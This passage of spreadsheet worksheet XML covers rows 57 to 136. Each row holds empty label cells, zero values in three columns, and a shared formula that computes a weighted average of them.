    <row r="57" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A57" s="41"/>
      <c r="B57" s="45"/>
      <c r="C57" s="14">
        <v>0</v>
      </c>
      <c r="D57" s="14">
        <v>0</v>
      </c>
      <c r="E57" s="14">
        <v>0</v>
      </c>
      <c r="F57" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="58" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A58" s="41"/>
      <c r="B58" s="45"/>
      <c r="C58" s="14">
        <v>0</v>
      </c>
      <c r="D58" s="14">
        <v>0</v>
      </c>
      <c r="E58" s="14">
        <v>0</v>
      </c>
      <c r="F58" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="59" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A59" s="41"/>
      <c r="B59" s="45"/>
      <c r="C59" s="14">
        <v>0</v>
      </c>
      <c r="D59" s="14">
        <v>0</v>
      </c>
      <c r="E59" s="14">
        <v>0</v>
      </c>
      <c r="F59" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="60" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A60" s="41"/>
      <c r="B60" s="45"/>
      <c r="C60" s="14">
        <v>0</v>
      </c>
      <c r="D60" s="14">
        <v>0</v>
      </c>
      <c r="E60" s="14">
        <v>0</v>
      </c>
      <c r="F60" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="61" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A61" s="41"/>
      <c r="B61" s="45"/>
      <c r="C61" s="14">
        <v>0</v>
      </c>
      <c r="D61" s="14">
        <v>0</v>
      </c>
      <c r="E61" s="14">
        <v>0</v>
      </c>
      <c r="F61" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="62" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A62" s="41"/>
      <c r="B62" s="45"/>
      <c r="C62" s="14">
        <v>0</v>
      </c>
      <c r="D62" s="14">
        <v>0</v>
      </c>
      <c r="E62" s="14">
        <v>0</v>
      </c>
      <c r="F62" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="63" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A63" s="41"/>
      <c r="B63" s="45"/>
      <c r="C63" s="14">
        <v>0</v>
      </c>
      <c r="D63" s="14">
        <v>0</v>
      </c>
      <c r="E63" s="14">
        <v>0</v>
      </c>
      <c r="F63" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="64" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A64" s="41"/>
      <c r="B64" s="45"/>
      <c r="C64" s="14">
        <v>0</v>
      </c>
      <c r="D64" s="14">
        <v>0</v>
      </c>
      <c r="E64" s="14">
        <v>0</v>
      </c>
      <c r="F64" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="65" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A65" s="41"/>
      <c r="B65" s="45"/>
      <c r="C65" s="14">
        <v>0</v>
      </c>
      <c r="D65" s="14">
        <v>0</v>
      </c>
      <c r="E65" s="14">
        <v>0</v>
      </c>
      <c r="F65" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="66" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A66" s="41"/>
      <c r="B66" s="45"/>
      <c r="C66" s="14">
        <v>0</v>
      </c>
      <c r="D66" s="14">
        <v>0</v>
      </c>
      <c r="E66" s="14">
        <v>0</v>
      </c>
      <c r="F66" s="32">
        <f t="shared" ref="F66:F129" si="1">((C66*2)+D66+(E66*2))/5</f>
        <v>0</v>
      </c>
    </row>
    <row r="67" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A67" s="41"/>
      <c r="B67" s="45"/>
      <c r="C67" s="14">
        <v>0</v>
      </c>
      <c r="D67" s="14">
        <v>0</v>
      </c>
      <c r="E67" s="14">
        <v>0</v>
      </c>
      <c r="F67" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="68" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A68" s="41"/>
      <c r="B68" s="45"/>
      <c r="C68" s="14">
        <v>0</v>
      </c>
      <c r="D68" s="14">
        <v>0</v>
      </c>
      <c r="E68" s="14">
        <v>0</v>
      </c>
      <c r="F68" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="69" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A69" s="41"/>
      <c r="B69" s="45"/>
      <c r="C69" s="14">
        <v>0</v>
      </c>
      <c r="D69" s="14">
        <v>0</v>
      </c>
      <c r="E69" s="14">
        <v>0</v>
      </c>
      <c r="F69" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="70" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A70" s="41"/>
      <c r="B70" s="45"/>
      <c r="C70" s="14">
        <v>0</v>
      </c>
      <c r="D70" s="14">
        <v>0</v>
      </c>
      <c r="E70" s="14">
        <v>0</v>
      </c>
      <c r="F70" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="71" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A71" s="41"/>
      <c r="B71" s="45"/>
      <c r="C71" s="14">
        <v>0</v>
      </c>
      <c r="D71" s="14">
        <v>0</v>
      </c>
      <c r="E71" s="14">
        <v>0</v>
      </c>
      <c r="F71" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="72" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A72" s="41"/>
      <c r="B72" s="45"/>
      <c r="C72" s="14">
        <v>0</v>
      </c>
      <c r="D72" s="14">
        <v>0</v>
      </c>
      <c r="E72" s="14">
        <v>0</v>
      </c>
      <c r="F72" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="73" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A73" s="41"/>
      <c r="B73" s="45"/>
      <c r="C73" s="14">
        <v>0</v>
      </c>
      <c r="D73" s="14">
        <v>0</v>
      </c>
      <c r="E73" s="14">
        <v>0</v>
      </c>
      <c r="F73" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="74" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A74" s="41"/>
      <c r="B74" s="45"/>
      <c r="C74" s="14">
        <v>0</v>
      </c>
      <c r="D74" s="14">
        <v>0</v>
      </c>
      <c r="E74" s="14">
        <v>0</v>
      </c>
      <c r="F74" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="75" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A75" s="41"/>
      <c r="B75" s="45"/>
      <c r="C75" s="14">
        <v>0</v>
      </c>
      <c r="D75" s="14">
        <v>0</v>
      </c>
      <c r="E75" s="14">
        <v>0</v>
      </c>
      <c r="F75" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="76" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A76" s="41"/>
      <c r="B76" s="45"/>
      <c r="C76" s="14">
        <v>0</v>
      </c>
      <c r="D76" s="14">
        <v>0</v>
      </c>
      <c r="E76" s="14">
        <v>0</v>
      </c>
      <c r="F76" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="77" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A77" s="41"/>
      <c r="B77" s="45"/>
      <c r="C77" s="14">
        <v>0</v>
      </c>
      <c r="D77" s="14">
        <v>0</v>
      </c>
      <c r="E77" s="14">
        <v>0</v>
      </c>
      <c r="F77" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="78" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A78" s="41"/>
      <c r="B78" s="45"/>
      <c r="C78" s="14">
        <v>0</v>
      </c>
      <c r="D78" s="14">
        <v>0</v>
      </c>
      <c r="E78" s="14">
        <v>0</v>
      </c>
      <c r="F78" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="79" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A79" s="41"/>
      <c r="B79" s="45"/>
      <c r="C79" s="14">
        <v>0</v>
      </c>
      <c r="D79" s="14">
        <v>0</v>
      </c>
      <c r="E79" s="14">
        <v>0</v>
      </c>
      <c r="F79" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="80" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A80" s="41"/>
      <c r="B80" s="45"/>
      <c r="C80" s="14">
        <v>0</v>
      </c>
      <c r="D80" s="14">
        <v>0</v>
      </c>
      <c r="E80" s="14">
        <v>0</v>
      </c>
      <c r="F80" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="81" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A81" s="41"/>
      <c r="B81" s="45"/>
      <c r="C81" s="14">
        <v>0</v>
      </c>
      <c r="D81" s="14">
        <v>0</v>
      </c>
      <c r="E81" s="14">
        <v>0</v>
      </c>
      <c r="F81" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="82" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A82" s="41"/>
      <c r="B82" s="45"/>
      <c r="C82" s="14">
        <v>0</v>
      </c>
      <c r="D82" s="14">
        <v>0</v>
      </c>
      <c r="E82" s="14">
        <v>0</v>
      </c>
      <c r="F82" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="83" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A83" s="41"/>
      <c r="B83" s="45"/>
      <c r="C83" s="14">
        <v>0</v>
      </c>
      <c r="D83" s="14">
        <v>0</v>
      </c>
      <c r="E83" s="14">
        <v>0</v>
      </c>
      <c r="F83" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="84" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A84" s="41"/>
      <c r="B84" s="45"/>
      <c r="C84" s="14">
        <v>0</v>
      </c>
      <c r="D84" s="14">
        <v>0</v>
      </c>
      <c r="E84" s="14">
        <v>0</v>
      </c>
      <c r="F84" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="85" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A85" s="41"/>
      <c r="B85" s="45"/>
      <c r="C85" s="14">
        <v>0</v>
      </c>
      <c r="D85" s="14">
        <v>0</v>
      </c>
      <c r="E85" s="14">
        <v>0</v>
      </c>
      <c r="F85" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="86" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A86" s="41"/>
      <c r="B86" s="45"/>
      <c r="C86" s="14">
        <v>0</v>
      </c>
      <c r="D86" s="14">
        <v>0</v>
      </c>
      <c r="E86" s="14">
        <v>0</v>
      </c>
      <c r="F86" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="87" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A87" s="41"/>
      <c r="B87" s="45"/>
      <c r="C87" s="14">
        <v>0</v>
      </c>
      <c r="D87" s="14">
        <v>0</v>
      </c>
      <c r="E87" s="14">
        <v>0</v>
      </c>
      <c r="F87" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="88" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A88" s="41"/>
      <c r="B88" s="45"/>
      <c r="C88" s="14">
        <v>0</v>
      </c>
      <c r="D88" s="14">
        <v>0</v>
      </c>
      <c r="E88" s="14">
        <v>0</v>
      </c>
      <c r="F88" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="89" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A89" s="41"/>
      <c r="B89" s="45"/>
      <c r="C89" s="14">
        <v>0</v>
      </c>
      <c r="D89" s="14">
        <v>0</v>
      </c>
      <c r="E89" s="14">
        <v>0</v>
      </c>
      <c r="F89" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="90" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A90" s="41"/>
      <c r="B90" s="45"/>
      <c r="C90" s="14">
        <v>0</v>
      </c>
      <c r="D90" s="14">
        <v>0</v>
      </c>
      <c r="E90" s="14">
        <v>0</v>
      </c>
      <c r="F90" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="91" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A91" s="41"/>
      <c r="B91" s="45"/>
      <c r="C91" s="14">
        <v>0</v>
      </c>
      <c r="D91" s="14">
        <v>0</v>
      </c>
      <c r="E91" s="14">
        <v>0</v>
      </c>
      <c r="F91" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="92" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A92" s="41"/>
      <c r="B92" s="45"/>
      <c r="C92" s="14">
        <v>0</v>
      </c>
      <c r="D92" s="14">
        <v>0</v>
      </c>
      <c r="E92" s="14">
        <v>0</v>
      </c>
      <c r="F92" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="93" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A93" s="41"/>
      <c r="B93" s="45"/>
      <c r="C93" s="14">
        <v>0</v>
      </c>
      <c r="D93" s="14">
        <v>0</v>
      </c>
      <c r="E93" s="14">
        <v>0</v>
      </c>
      <c r="F93" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="94" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A94" s="41"/>
      <c r="B94" s="45"/>
      <c r="C94" s="14">
        <v>0</v>
      </c>
      <c r="D94" s="14">
        <v>0</v>
      </c>
      <c r="E94" s="14">
        <v>0</v>
      </c>
      <c r="F94" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="95" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A95" s="41"/>
      <c r="B95" s="45"/>
      <c r="C95" s="14">
        <v>0</v>
      </c>
      <c r="D95" s="14">
        <v>0</v>
      </c>
      <c r="E95" s="14">
        <v>0</v>
      </c>
      <c r="F95" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="96" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A96" s="41"/>
      <c r="B96" s="45"/>
      <c r="C96" s="14">
        <v>0</v>
      </c>
      <c r="D96" s="14">
        <v>0</v>
      </c>
      <c r="E96" s="14">
        <v>0</v>
      </c>
      <c r="F96" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="97" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A97" s="41"/>
      <c r="B97" s="45"/>
      <c r="C97" s="14">
        <v>0</v>
      </c>
      <c r="D97" s="14">
        <v>0</v>
      </c>
      <c r="E97" s="14">
        <v>0</v>
      </c>
      <c r="F97" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="98" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A98" s="41"/>
      <c r="B98" s="45"/>
      <c r="C98" s="14">
        <v>0</v>
      </c>
      <c r="D98" s="14">
        <v>0</v>
      </c>
      <c r="E98" s="14">
        <v>0</v>
      </c>
      <c r="F98" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="99" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A99" s="41"/>
      <c r="B99" s="45"/>
      <c r="C99" s="14">
        <v>0</v>
      </c>
      <c r="D99" s="14">
        <v>0</v>
      </c>
      <c r="E99" s="14">
        <v>0</v>
      </c>
      <c r="F99" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="100" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A100" s="41"/>
      <c r="B100" s="45"/>
      <c r="C100" s="14">
        <v>0</v>
      </c>
      <c r="D100" s="14">
        <v>0</v>
      </c>
      <c r="E100" s="14">
        <v>0</v>
      </c>
      <c r="F100" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="101" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A101" s="41"/>
      <c r="B101" s="45"/>
      <c r="C101" s="14">
        <v>0</v>
      </c>
      <c r="D101" s="14">
        <v>0</v>
      </c>
      <c r="E101" s="14">
        <v>0</v>
      </c>
      <c r="F101" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="102" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A102" s="41"/>
      <c r="B102" s="45"/>
      <c r="C102" s="14">
        <v>0</v>
      </c>
      <c r="D102" s="14">
        <v>0</v>
      </c>
      <c r="E102" s="14">
        <v>0</v>
      </c>
      <c r="F102" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="103" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A103" s="41"/>
      <c r="B103" s="45"/>
      <c r="C103" s="14">
        <v>0</v>
      </c>
      <c r="D103" s="14">
        <v>0</v>
      </c>
      <c r="E103" s="14">
        <v>0</v>
      </c>
      <c r="F103" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="104" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A104" s="41"/>
      <c r="B104" s="45"/>
      <c r="C104" s="14">
        <v>0</v>
      </c>
      <c r="D104" s="14">
        <v>0</v>
      </c>
      <c r="E104" s="14">
        <v>0</v>
      </c>
      <c r="F104" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="105" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A105" s="41"/>
      <c r="B105" s="45"/>
      <c r="C105" s="14">
        <v>0</v>
      </c>
      <c r="D105" s="14">
        <v>0</v>
      </c>
      <c r="E105" s="14">
        <v>0</v>
      </c>
      <c r="F105" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="106" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A106" s="41"/>
      <c r="B106" s="45"/>
      <c r="C106" s="14">
        <v>0</v>
      </c>
      <c r="D106" s="14">
        <v>0</v>
      </c>
      <c r="E106" s="14">
        <v>0</v>
      </c>
      <c r="F106" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="107" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A107" s="41"/>
      <c r="B107" s="45"/>
      <c r="C107" s="14">
        <v>0</v>
      </c>
      <c r="D107" s="14">
        <v>0</v>
      </c>
      <c r="E107" s="14">
        <v>0</v>
      </c>
      <c r="F107" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="108" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A108" s="41"/>
      <c r="B108" s="45"/>
      <c r="C108" s="14">
        <v>0</v>
      </c>
      <c r="D108" s="14">
        <v>0</v>
      </c>
      <c r="E108" s="14">
        <v>0</v>
      </c>
      <c r="F108" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="109" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A109" s="41"/>
      <c r="B109" s="45"/>
      <c r="C109" s="14">
        <v>0</v>
      </c>
      <c r="D109" s="14">
        <v>0</v>
      </c>
      <c r="E109" s="14">
        <v>0</v>
      </c>
      <c r="F109" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="110" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A110" s="41"/>
      <c r="B110" s="45"/>
      <c r="C110" s="14">
        <v>0</v>
      </c>
      <c r="D110" s="14">
        <v>0</v>
      </c>
      <c r="E110" s="14">
        <v>0</v>
      </c>
      <c r="F110" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="111" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A111" s="41"/>
      <c r="B111" s="45"/>
      <c r="C111" s="14">
        <v>0</v>
      </c>
      <c r="D111" s="14">
        <v>0</v>
      </c>
      <c r="E111" s="14">
        <v>0</v>
      </c>
      <c r="F111" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="112" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A112" s="41"/>
      <c r="B112" s="45"/>
      <c r="C112" s="14">
        <v>0</v>
      </c>
      <c r="D112" s="14">
        <v>0</v>
      </c>
      <c r="E112" s="14">
        <v>0</v>
      </c>
      <c r="F112" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="113" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A113" s="41"/>
      <c r="B113" s="45"/>
      <c r="C113" s="14">
        <v>0</v>
      </c>
      <c r="D113" s="14">
        <v>0</v>
      </c>
      <c r="E113" s="14">
        <v>0</v>
      </c>
      <c r="F113" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="114" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A114" s="41"/>
      <c r="B114" s="45"/>
      <c r="C114" s="14">
        <v>0</v>
      </c>
      <c r="D114" s="14">
        <v>0</v>
      </c>
      <c r="E114" s="14">
        <v>0</v>
      </c>
      <c r="F114" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="115" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A115" s="41"/>
      <c r="B115" s="45"/>
      <c r="C115" s="14">
        <v>0</v>
      </c>
      <c r="D115" s="14">
        <v>0</v>
      </c>
      <c r="E115" s="14">
        <v>0</v>
      </c>
      <c r="F115" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="116" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A116" s="41"/>
      <c r="B116" s="45"/>
      <c r="C116" s="14">
        <v>0</v>
      </c>
      <c r="D116" s="14">
        <v>0</v>
      </c>
      <c r="E116" s="14">
        <v>0</v>
      </c>
      <c r="F116" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="117" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A117" s="41"/>
      <c r="B117" s="45"/>
      <c r="C117" s="14">
        <v>0</v>
      </c>
      <c r="D117" s="14">
        <v>0</v>
      </c>
      <c r="E117" s="14">
        <v>0</v>
      </c>
      <c r="F117" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="118" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A118" s="41"/>
      <c r="B118" s="45"/>
      <c r="C118" s="14">
        <v>0</v>
      </c>
      <c r="D118" s="14">
        <v>0</v>
      </c>
      <c r="E118" s="14">
        <v>0</v>
      </c>
      <c r="F118" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="119" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A119" s="41"/>
      <c r="B119" s="45"/>
      <c r="C119" s="14">
        <v>0</v>
      </c>
      <c r="D119" s="14">
        <v>0</v>
      </c>
      <c r="E119" s="14">
        <v>0</v>
      </c>
      <c r="F119" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="120" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A120" s="41"/>
      <c r="B120" s="45"/>
      <c r="C120" s="14">
        <v>0</v>
      </c>
      <c r="D120" s="14">
        <v>0</v>
      </c>
      <c r="E120" s="14">
        <v>0</v>
      </c>
      <c r="F120" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="121" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A121" s="41"/>
      <c r="B121" s="45"/>
      <c r="C121" s="14">
        <v>0</v>
      </c>
      <c r="D121" s="14">
        <v>0</v>
      </c>
      <c r="E121" s="14">
        <v>0</v>
      </c>
      <c r="F121" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="122" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A122" s="41"/>
      <c r="B122" s="45"/>
      <c r="C122" s="14">
        <v>0</v>
      </c>
      <c r="D122" s="14">
        <v>0</v>
      </c>
      <c r="E122" s="14">
        <v>0</v>
      </c>
      <c r="F122" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="123" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A123" s="41"/>
      <c r="B123" s="45"/>
      <c r="C123" s="14">
        <v>0</v>
      </c>
      <c r="D123" s="14">
        <v>0</v>
      </c>
      <c r="E123" s="14">
        <v>0</v>
      </c>
      <c r="F123" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="124" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A124" s="41"/>
      <c r="B124" s="45"/>
      <c r="C124" s="14">
        <v>0</v>
      </c>
      <c r="D124" s="14">
        <v>0</v>
      </c>
      <c r="E124" s="14">
        <v>0</v>
      </c>
      <c r="F124" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="125" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A125" s="41"/>
      <c r="B125" s="45"/>
      <c r="C125" s="14">
        <v>0</v>
      </c>
      <c r="D125" s="14">
        <v>0</v>
      </c>
      <c r="E125" s="14">
        <v>0</v>
      </c>
      <c r="F125" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="126" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A126" s="41"/>
      <c r="B126" s="45"/>
      <c r="C126" s="14">
        <v>0</v>
      </c>
      <c r="D126" s="14">
        <v>0</v>
      </c>
      <c r="E126" s="14">
        <v>0</v>
      </c>
      <c r="F126" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="127" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A127" s="41"/>
      <c r="B127" s="45"/>
      <c r="C127" s="14">
        <v>0</v>
      </c>
      <c r="D127" s="14">
        <v>0</v>
      </c>
      <c r="E127" s="14">
        <v>0</v>
      </c>
      <c r="F127" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="128" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A128" s="41"/>
      <c r="B128" s="45"/>
      <c r="C128" s="14">
        <v>0</v>
      </c>
      <c r="D128" s="14">
        <v>0</v>
      </c>
      <c r="E128" s="14">
        <v>0</v>
      </c>
      <c r="F128" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="129" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A129" s="41"/>
      <c r="B129" s="45"/>
      <c r="C129" s="14">
        <v>0</v>
      </c>
      <c r="D129" s="14">
        <v>0</v>
      </c>
      <c r="E129" s="14">
        <v>0</v>
      </c>
      <c r="F129" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="130" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A130" s="41"/>
      <c r="B130" s="45"/>
      <c r="C130" s="14">
        <v>0</v>
      </c>
      <c r="D130" s="14">
        <v>0</v>
      </c>
      <c r="E130" s="14">
        <v>0</v>
      </c>
      <c r="F130" s="32">
        <f t="shared" ref="F130:F193" si="2">((C130*2)+D130+(E130*2))/5</f>
        <v>0</v>
      </c>
    </row>
    <row r="131" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A131" s="41"/>
      <c r="B131" s="45"/>
      <c r="C131" s="14">
        <v>0</v>
      </c>
      <c r="D131" s="14">
        <v>0</v>
      </c>
      <c r="E131" s="14">
        <v>0</v>
      </c>
      <c r="F131" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="132" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A132" s="41"/>
      <c r="B132" s="45"/>
      <c r="C132" s="14">
        <v>0</v>
      </c>
      <c r="D132" s="14">
        <v>0</v>
      </c>
      <c r="E132" s="14">
        <v>0</v>
      </c>
      <c r="F132" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="133" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A133" s="41"/>
      <c r="B133" s="45"/>
      <c r="C133" s="14">
        <v>0</v>
      </c>
      <c r="D133" s="14">
        <v>0</v>
      </c>
      <c r="E133" s="14">
        <v>0</v>
      </c>
      <c r="F133" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="134" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A134" s="41"/>
      <c r="B134" s="45"/>
      <c r="C134" s="14">
        <v>0</v>
      </c>
      <c r="D134" s="14">
        <v>0</v>
      </c>
      <c r="E134" s="14">
        <v>0</v>
      </c>
      <c r="F134" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="135" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A135" s="41"/>
      <c r="B135" s="45"/>
      <c r="C135" s="14">
        <v>0</v>
      </c>
      <c r="D135" s="14">
        <v>0</v>
      </c>
      <c r="E135" s="14">
        <v>0</v>
      </c>
      <c r="F135" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="136" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A136" s="41"/>
      <c r="B136" s="45"/>
      <c r="C136" s="14">
        <v>0</v>
      </c>
